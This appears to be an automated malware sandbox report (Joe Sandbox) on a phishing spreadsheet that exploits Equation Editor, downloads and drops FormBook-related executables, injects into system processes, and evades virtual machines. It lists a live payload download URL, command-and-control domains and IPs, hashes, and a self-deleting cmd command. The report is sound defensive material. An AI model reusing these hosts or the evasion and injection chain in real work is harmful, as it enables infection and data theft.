            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

            Boot Survival:

            Drops PE files to the user root directory
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: Booking Confirmation.xlsx Stream path 'EncryptedPackage' entropy: 7.99989686385 (max. 8.0)

            Malware Analysis System Evasion:

            Yara detected AntiVM_3
            Source: Yara matchFile source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001298E4 second address: 00000000001298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000129B4E second address: 0000000000129B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409A80 rdtsc 5_2_00409A80
            Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300 Thread sleep time: -360000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2944 Thread sleep time: -51520s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2424 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1920 Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 3008 Thread sleep time: -50000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.2197981181.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
            Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01dRom0
            Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01
            Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000006.00000000.2197961773.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
            Source: explorer.exe, 00000006.00000000.2197918909.00000000041DB000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 00000006.00000002.2378407357.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040ACC0 LdrLoadDll,5_2_0040ACC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]5_2_009226F8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F826F8 mov eax, dword ptr fs:[00000030h]7_2_01F826F8
            Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exe Process token adjusted: Debug
            Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe Network Connect: 216.130.188.93 80
            Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
            Injects a PE file into a foreign processes
            Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 1388
            Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 1388
            Queues an APC in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 9A0000
            Writes to foreign memory regions
            Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 712 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 321 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 111 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 11 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 22 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 712 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 41 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 2 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            [Behavior graph, ID 323046. Sample: Booking Confirmation.xlsx; start date: 26/11/2020; architecture: WINDOWS; score: 100. Process chain shown: EQNEDT32.EXE started vbc.exe, vbc.exe started RegSvcs.exe, RegSvcs.exe injected explorer.exe, explorer.exe started raserver.exe, raserver.exe started cmd.exe; EXCEL.EXE started separately.]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label | Link
            Booking Confirmation.xlsx | 31% | Virustotal | | Browse
            Booking Confirmation.xlsx | 25% | ReversingLabs | Document-Word.Trojan.Phishing |

            Dropped Files

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 25% | ReversingLabs | Win32.Trojan.Wacatac |
            C:\Users\Public\vbc.exe | 25% | ReversingLabs | Win32.Trojan.Wacatac |

            Unpacked PE Files

            Source | Detection | Scanner | Label | Link | Download
            5.2.RegSvcs.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

            Domains

            Source | Detection | Scanner | Label | Link
            setyourhead.com | 1% | Virustotal | | Browse
            workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | 5% | Virustotal | | Browse

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            setyourhead.com | 34.102.136.180 | true | true |  | unknown
            workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | 103.125.191.5 | true | true |  | unknown
            affinitymotorsales.com | 216.130.188.93 | true | true |  | unknown
            www.akmh.pro | unknown | unknown | true |  | unknown
            www.setyourhead.com | unknown | unknown | true |  | unknown
            www.affinitymotorsales.com | unknown | unknown | true |  | unknown

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe | true | Avira URL Cloud: malware | unknown
                    http://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.tesco.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.interpark.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://investor.msn.com/explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.%s.comPAexplorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    low

                                                                                                                                                    Contacted IPs


                                                                                                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.125.191.5 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
216.130.188.93 | unknown | United States | 27257 | WEBAIR-INTERNETUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true

                                                                                                                                                    General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323046
Start date: 26.11.2020
Start time: 09:02:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 15s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Booking Confirmation.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/6@5/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.2% (good quality ratio 25.8%)
• Quality average: 72.6%
• Quality standard deviation: 28%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 120
• Number of non-executed functions: 30
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

Time | Type | Description
09:03:13 | API Interceptor | 120x Sleep call for process: EQNEDT32.EXE modified
09:03:18 | API Interceptor | 69x Sleep call for process: vbc.exe modified
09:03:28 | API Interceptor | 33x Sleep call for process: RegSvcs.exe modified
09:03:42 | API Interceptor | 223x Sleep call for process: raserver.exe modified
09:04:18 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                    • www.pethgroup.com/mfg6/?Dz=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSeqAONTEuC2HA&lnuh=TxllfFx

                                                                                                                                                    Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                    ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):909312
                                                                                                                                                    Entropy (8bit):7.22680766280546
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:E5fo9DEV8CEYZMCu9CJCxlc895/UMDckNbeBM3O9rYCbo46yV5zPvE7MToVZzURg:+o9QeVqjQzlcG5MMDcCbGVGY5LvE7
                                                                                                                                                    MD5:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    SHA1:BAB24B772B269A5D66B26A12501DADE43B80FFDE
                                                                                                                                                    SHA-256:C66456AF669C07CCF8045DEDD1B961E4CAA3541F44BDBCB22B9E842628A10329
                                                                                                                                                    SHA-512:EDD323EB8058BEFFD2ECF87C2F5793A13896F952F5B364AC3C9D2F918165E4671DBEAC76C102AAF13D43B9DFAE18B65B728D72A9ACEB7BCE48842879AE44F3D1
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                    IE Cache URL:http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emf
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1099960
                                                                                                                                                    Entropy (8bit):2.0153298378795275
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:PXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:VahIFdyiaT2qtXw
                                                                                                                                                    MD5:26D1591924B93332C93C4DAC0950AE17
                                                                                                                                                    SHA1:3E92ECC9EF71E262C4607DED0ED85C0C16FCF18E
                                                                                                                                                    SHA-256:B6FB1C5D8AA5E51E4668270CA5BCDDBE6F5A0DC292F9D82CA429240CDEB47A84
                                                                                                                                                    SHA-512:797D4CDF629E88C835FEC6ED915508221F6CEF3AEFFAFEFD103BFFD683B08F4B422D957DDB94D316E979C7A3C272346734DA1117F25A3AE644CB6EE3B9B6A5B3
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A709BC1.jpeg
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48770
                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB9FCECE.jpeg
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48770
                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\Desktop\~$Booking Confirmation.xlsx
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
